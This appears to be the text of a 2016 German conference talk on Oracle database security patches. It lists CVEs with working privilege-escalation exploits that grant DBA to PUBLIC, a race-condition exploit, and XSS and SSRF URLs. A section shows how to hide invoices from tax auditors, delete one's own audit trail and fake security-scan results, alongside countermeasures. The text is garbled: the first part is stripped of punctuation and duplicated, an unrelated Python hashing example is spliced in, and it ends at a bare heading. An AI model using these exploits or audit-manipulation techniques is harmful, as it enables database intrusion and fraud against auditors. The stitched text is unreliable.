the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Introduction
What will be shown in the next 45 minutes
iexcl Oracle Security Patches
iexcl Modify SQL statements amp Application Logic
iexcl Outlook 2017
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
  SELECT COUNT(*) INTO CNT
    FROM V$OPEN_CURSOR OC, V$SQL S, V$OBJECT_DEPENDENCY OD
   WHERE OC.SID = USER_SID AND [...] AND OD.TO_TYPE IN (7, 8, 9, 11);

Here OD.TO_TYPEs 7, 8, 9 and 11 are functions, procedures, packages and objects. If any such dependency exists, the user-supplied query is not executed and an error is raised:

  IF (CNT > 0) THEN
    WMSYS.WM_ERROR.RAISEERROR(WMSYS.LT.WM_ERROR_81_NO);
  END IF;

The user-supplied WHERE clause is then concatenated into a dynamic block that LTADM (definer rights, i.e. WMSYS) executes:

  SQL_STR2 := 'declare delstatuses wmsys.ltUtil.number_tab; begin '
           || 'select WM_delstatus bulk collect into delstatuses from '
           || WMSYS.LTUTIL.GETVN(TABLE_OWNER, TAB_NAME, '_BASE')
           || ' where WM_version = ' || CURVER
           || ' and ' || NEWWHERE_CLAUSE || ' for update; end;';
  WMSYS.LTADM.EXECSQL(SQL_STR2);

Jan 2016 CPU - CVE-2015-4925

  SQL> CONNECT RACER/PASSWORD
  SQL> CREATE TABLE FOO(X NUMBER, CONSTRAINT X_PK PRIMARY KEY(X));
  SQL> INSERT INTO FOO (X) VALUES (1);
  SQL> COMMIT;
  SQL> EXEC WMSYS.LT.ENABLEVERSIONING('FOO');

  SQL> create or replace function Y return number authid current_user is
         pragma autonomous_transaction;
       begin
         dbms_output.put_line('BANG');
         execute immediate 'create or replace procedure owned(p varchar) is begin execute immediate p; end;';
         execute immediate 'grant execute on owned to public';
         dbms_output.put_line(sys_context('userenv', 'current_user'));
         return 1;
       end;
       /

Jan 2016 CPU - CVE-2015-4925

  SQL> GRANT EXECUTE ON Y TO PUBLIC;
  SQL> CREATE TABLE RACER(Y NUMBER);
  SQL> INSERT INTO RACER(Y) VALUES (1);
  SQL> COMMIT;

  SQL> create or replace procedure attempt_it is
       begin
         execute immediate 'BEGIN WMSYS.LT.COPYFORUPDATE(''FOO'', ''X=LENGTH((SELECT 1 FROM RACER.RACER WHERE RACER.Y=1))''); END;';
       exception when others then
         null;
       end;
       /

  SQL> declare
         i number := 0;
       begin
         for i in 1..1000 loop
           execute immediate 'alter table RACER.RACER rename column Y to Z';
           execute immediate 'alter table RACER.RACER rename column Z to Y';
         end loop;
       end;
       /

Jan 2016 CPU - CVE-2015-4925

  SQL> DESC WMSYS.OWNED
  PROCEDURE WMSYS.OWNED
   Argument Name                  Type                    In/Out Default?
   ------------------------------ ----------------------- ------ --------
   P                              VARCHAR2                IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html

April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure really does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, the following must also be added:
  AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL;
Reporter: David Litchfield
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a missing function (missing due to a lacking execute privilege) is used within a SELECT query, the name of the function is not logged, only the name of the table in the query.
Reporter: David Litchfield
Exploit: obvious (Create Java Source…)
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, which is possible because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
  http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on the given port and POST "X" as a payload. This can be used as a port scanning mechanism, to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
  http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: The package dbms_gsm_common allows changing database parameters without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
  exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE');

Jul 2016 CPU - CVE-2016-3488

  -- as SYS
  SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
  O7_DICTIONARY_ACCESSIBILITY FALSE

  -- as user GSMUSER
  SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE');
  PL/SQL-Prozedur erfolgreich abgeschlossen.

  -- as user SYS: re-run the query after execution of the package
  SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
  O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (details + exploit later…):

  FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
    TMP  VARCHAR2(32767);
    TMP2 VARCHAR2(32767);
  BEGIN
    SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
    IF LENGTH(TMP) = 4000 THEN
      RETURN 'N';
    END IF;
    TMP2 := UPPER(TMP);
    IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
      RETURN 'N';
    END IF;
    RETURN 'Y';
  END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function-based index (FBI)
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489

  -- Oracle 11.2.0.4
  SYSTEM> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE = OWNER and owner = 'SYS';
  GRANTEE   OWNER   TABLE_NAME
  --------- ------- ----------
  SYSTEM    SYS     INCEXP
  SYSTEM    SYS     INCFIL
  SYSTEM    SYS     INCVID

  SYSTEM> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
            PRAGMA AUTONOMOUS_TRANSACTION;
          BEGIN
            execute immediate 'grant select on sys.link$ to public';
            COMMIT;
            RETURN FOO;
          END;
          /
  SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489

  ==> SYSTEM does not have access to the SYS.LINK$ table
  SQL> select count(*) from sys.link$;
  ERROR at line 1:
  ORA-01031: insufficient privileges

  ==> also the execution of getdba throws an error
  SQL> select getdba('i') from dual;
  ERROR at line 1:
  ORA-01031: insufficient privileges
  ORA-06512: at "SYSTEM.GETDBA", line 4

  ==> Now create an index on the table sys.incvid using a function-based index
  SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
  Index created.

  SQL> select count(*) from sys.link$;
    COUNT(*)
  ----------
          11

July 2016 CPU - CVE-2016-3489

  -- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
  SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'));
  CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'))
  FEHLER in Zeile 1:
  ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
  ORA-06512: in "SYSTEM.GETDBA", Zeile 1

  -- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX, and the SYSTEM user can use
  -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
  CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
    PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    execute immediate 'grant select on sys.link$ to public';
    COMMIT;
    RETURN FOO;
  END;
  /
  SQL> grant execute on wmsys.getdba to public;

  -- now we create the index
  SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel/PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE (DIGEST VERIFIER)
Shown as an open problem in the DOAG 2015 presentation
Reporter: Alexander Kornbrust

Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2/SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA-1 based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.

Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
  KD(secret, data) = H(concat(secret, ":", data))
No salt, but a "secret":
  Secret = 'XDB'
and the hash will be MD5('XDB:tiger'),
stored in the spare4 column, starting with "H:" (the H hash).
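As an added illustration (not from the deck), the following Python reproduces the RFC 2617 construction the slide quotes, using the slide's secret 'XDB', and puts it next to a salted PBKDF2-HMAC-SHA512 verifier to show why the missing salt matters: the unsalted digest is a pure function of the password, so one precomputed table answers for every database, while each salted verifier has to be attacked on its own. The "H:" prefix and upper-case hex are layout assumptions, and the PBKDF2 salt length and iteration count are illustrative, not the 12c T: parameters.

```python
import hashlib
import os


def rfc2617_kd(secret: str, data: str, h=hashlib.md5) -> str:
    """KD(secret, data) = H(concat(secret, ":", data)), as written in RFC 2617."""
    return h(f"{secret}:{data}".encode("utf-8")).hexdigest()


def digest_verifier(password: str, realm: str = "XDB") -> str:
    """The slide's construction: MD5(XDB:password).  No random salt is involved,
    so the same password always yields the same verifier (prefix layout assumed)."""
    return "H:" + rfc2617_kd(realm, password).upper()


def pbkdf2_verifier(password: str, salt: bytes = None, iterations: int = 4096):
    """Salted PBKDF2-HMAC-SHA512 for contrast.  Salt length and iteration count
    are illustrative assumptions, not the real 12c T: verifier parameters."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, iterations)
    return salt, dk.hex()


def same_password_same_verifier(password: str) -> bool:
    """Unsalted: two accounts (or two databases) with this password share one verifier."""
    return digest_verifier(password) == digest_verifier(password)


def salted_verifiers_differ(password: str) -> bool:
    """Salted: the same password stored twice produces two unrelated verifiers."""
    s1, v1 = pbkdf2_verifier(password)
    s2, v2 = pbkdf2_verifier(password)
    return s1 != s2 and v1 != v2


def precomputed_lookup(candidates, target_verifier: str):
    """A table built once from a word list recovers any account whose unsalted
    verifier appears in it; with a per-user salt the table is useless."""
    table = {digest_verifier(c): c for c in candidates}
    return table.get(target_verifier)


if __name__ == "__main__":
    # Constructed sample: the slide's user/password pair and a small word list.
    v = digest_verifier("tiger")
    print(v, precomputed_lookup(["welcome1", "tiger", "oracle"], v))
```

The lookup function is the whole argument: hashing a word list once yields a dictionary that maps every unsalted digest verifier back to its password, regardless of which database it came from.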
Oct 2016 CPU - CVE-2016-5516
